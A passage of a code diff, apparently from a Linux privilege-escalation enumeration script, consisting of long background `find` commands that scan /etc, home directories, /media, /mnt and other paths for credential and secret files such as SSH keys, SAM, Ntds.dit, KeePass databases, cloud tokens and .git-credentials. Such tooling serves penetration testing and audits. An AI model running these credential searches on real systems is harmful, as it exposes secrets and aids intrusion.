-name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"*knockd*\" -o -name \".gitconfig\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o 